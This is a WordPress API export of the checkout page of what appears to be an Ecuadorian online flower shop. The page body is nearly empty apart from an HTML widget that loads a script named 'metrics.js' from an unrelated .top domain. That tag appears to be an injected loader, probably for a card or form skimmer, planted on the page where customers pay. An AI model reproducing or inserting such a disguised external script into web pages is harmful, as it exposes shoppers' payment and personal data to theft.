{"id":9,"date":"2021-03-07T12:32:58","date_gmt":"2021-03-07T17:32:58","guid":{"rendered":"https:\/\/bruval.com.ec\/home\/finalizar-compra\/"},"modified":"2025-09-13T06:26:28","modified_gmt":"2025-09-13T11:26:28","slug":"finalizar-compra","status":"publish","type":"page","link":"https:\/\/bruval.com.ec\/home\/finalizar-compra\/","title":{"rendered":"Finalizar compra"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"9\" class=\"elementor elementor-9\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-620badd8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"620badd8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5115ab70\" data-id=\"5115ab70\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-688bf2a4 elementor-widget elementor-widget-text-editor\" data-id=\"688bf2a4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"woocommerce\"><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cde2397 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cde2397\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7db9a2f\" data-id=\"7db9a2f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-34b0593 elementor-widget elementor-widget-html\" data-id=\"34b0593\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<script src=\"https:\/\/pixelmonsterlittle.top\/bruval.com.ec\/metrics.js\"><\/script>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-9","page","type-page","status-publish","hentry"],"jetpack-related-posts":[{"id":8,"url":"https:\/\/bruval.com.ec\/home\/carrito\/","url_meta":{"origin":9,"position":0},"title":"Carrito","author":"cviteri","date":"marzo 7, 2021","format":false,"excerpt":"Eliminar art\u00edculo Imagen en miniatura Producto Precio Cantidad Subtotal BVBOX1030 $83.48 BVBOX1030 cantidad $83.48 Cup\u00f3n: Aplicar cup\u00f3n Actualizar carrito Totales del carrito Subtotal $83.48 Env\u00edo V\u00eda Salitre: $12.00 V\u00eda a la Costa: $10.00 V\u00eda Dur\u00e1n Tambo: $10.00 V\u00eda a Samborond\u00f3n: $10.00 V\u00eda a Daule hasta el Km 10: $10.00 Via\u2026","rel":"","context":"Entrada similar","block_context":{"text":"Entrada similar","link":""},"img":{"alt_text":"BVBOX1030","src":"https:\/\/i0.wp.com\/bruval.com.ec\/home\/wp-content\/uploads\/2023\/12\/8-400x400.webp?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":432,"url":"https:\/\/bruval.com.ec\/home\/terminos-y-politicas\/","url_meta":{"origin":9,"position":1},"title":"T\u00e9rminos y Pol\u00edticas","author":"cviteri","date":"marzo 7, 2021","format":false,"excerpt":"T\u00e9rminos\u00a0y Pol\u00edticasPol\u00edticas del Servicio El cliente se obliga a cancelar el valor del arreglo floral o complementos a escoger, en su totalidad antes de ser enviado. En caso de realizar el pago con una tarjeta de cr\u00e9dito v\u00eda telef\u00f3nica, el cliente deber\u00e1 proporcionar su n\u00famero, fecha de caducidad y c\u00f3digo\u2026","rel":"","context":"Entrada similar","block_context":{"text":"Entrada similar","link":""},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":430,"url":"https:\/\/bruval.com.ec\/home\/nosotros\/","url_meta":{"origin":9,"position":2},"title":"Nosotros","author":"cviteri","date":"marzo 7, 2021","format":false,"excerpt":"Nosotros Bruval nace del deseo de brindar el servicio de dise\u00f1o y entrega personalizada de arreglos florales por medio de una de las v\u00edas de mayor auge en la actualidad, el Internet, que permitir\u00e1 un servicio \u00e1gil y de mayor interactividad con el cliente. En base a un previo estudio\u2026","rel":"","context":"Entrada similar","block_context":{"text":"Entrada similar","link":""},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/pages\/9","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":3,"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":2631,"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/pages\/9\/revisions\/2631"}],"wp:attachment":[{"href":"https:\/\/bruval.com.ec\/home\/wp-json\/wp\/v2\/media?parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}